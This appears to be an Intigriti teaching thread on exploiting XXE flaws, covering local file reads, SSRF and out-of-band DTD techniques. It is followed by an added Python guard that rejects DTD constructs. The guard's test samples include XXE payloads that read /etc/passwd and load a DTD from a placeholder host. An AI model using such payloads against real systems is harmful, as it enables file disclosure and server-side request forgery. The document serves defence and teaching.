XXE exploitation
Today, we will cover how you can successfully exploit XXE vulnerabilities
If you aren't familiar with the concepts of XXE yet...
This thread is made just for you!
1️⃣ Basic exploitation via XML Entities
Let's start off with the most basic example
A web app that queries the backend to retrieve your previously sent messages
To test if this feature is vulnerable to XXE, we could try and retrieve a local file
To do so, we'd have to add the XML entity definition ourselves:
Afterwards, include your entity in the field and send the request
The response should contain the contents of the local file "/etc/passwd"
But we can also take the same approach to request an internal or external resource and escalate this into an SSRF vulnerability!
2️⃣ Exploitation via OOB technique
This exploitation technique involves us hosting a DTD file and referencing it in our payload
The XML parser will then parse our malicious XML data and retrieve the external DTD
That DTD file contains our payload
And just as before, we can send our request and retrieve the contents of a local file for example!
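As an added example (not code from the Intigriti thread or any app it describes), here is the defender-side counterpart in Python's stdlib expat: a guard in the style of defusedxml that refuses any DOCTYPE, entity declaration or external entity reference, which stops both techniques above before any entity can be resolved. The sample documents are constructed in the shape the thread describes; the DTD hostname is a placeholder.

```python
import xml.parsers.expat

class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, entity or external reference."""

def parse_without_dtd(xml_bytes: bytes) -> dict:
    """Parse XML into {leaf element: text}, aborting on any DTD construct.
    Both techniques in the thread need a DOCTYPE (inline ENTITY or external
    DTD), so refusing it up front blocks both before any entity is resolved."""
    parser = xml.parsers.expat.ParserCreate()
    fields, open_elems = {}, []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} rejected (SYSTEM={system_id!r})")

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise DTDForbidden(f"entity declaration {name!r} rejected")

    def reject_external_ref(context, base, system_id, public_id):
        raise DTDForbidden(f"external entity {system_id!r} rejected")

    def text(data):  # accumulate text of the innermost open element
        if open_elems and data.strip():
            fields[open_elems[-1]] = fields.get(open_elems[-1], "") + data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref
    parser.StartElementHandler = lambda name, attrs: open_elems.append(name)
    parser.EndElementHandler = lambda name: open_elems.pop()
    parser.CharacterDataHandler = text
    parser.Parse(xml_bytes, True)
    return fields

def is_safe(xml_bytes: bytes) -> bool:
    """True if the document parsed cleanly, False if a DTD construct was rejected."""
    try:
        parse_without_dtd(xml_bytes)
        return True
    except DTDForbidden:
        return False

# Constructed samples: a benign message plus the two payload shapes the thread describes.
BENIGN = b"<messages><message>hello</message></messages>"
INLINE_ENTITY = (b'<!DOCTYPE m [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 b"<messages><message>&xxe;</message></messages>")
# OOB shape: DOCTYPE fetching an external DTD; the host is a placeholder, not a real address.
EXTERNAL_DTD = (b'<!DOCTYPE m SYSTEM "http://dtd-host.example/payload.dtd">'
                b"<messages><message>x</message></messages>")
```

Whether a given app is exploitable depends on how its own XML library is configured; this guard is the pre-parse check to apply when that configuration cannot be trusted.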
We hope you've learned something new from this thread on XXE exploitation:
If you have enjoyed this thread:
1. Follow us @INTIGRITI for more of these threads
2. Retweet the first Tweet to share it with your friends